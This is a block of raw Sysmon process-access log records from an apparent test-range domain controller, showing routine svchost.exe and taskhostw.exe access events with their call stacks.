13:58:21.055{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.055{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.055{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.055{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.055{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.055{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.055{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.055{59A5CD1D-93FB-6005-FE04-00000000A301}51084896C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.992{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.961{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.961{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.961{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.961{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.961{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.961{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.961{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 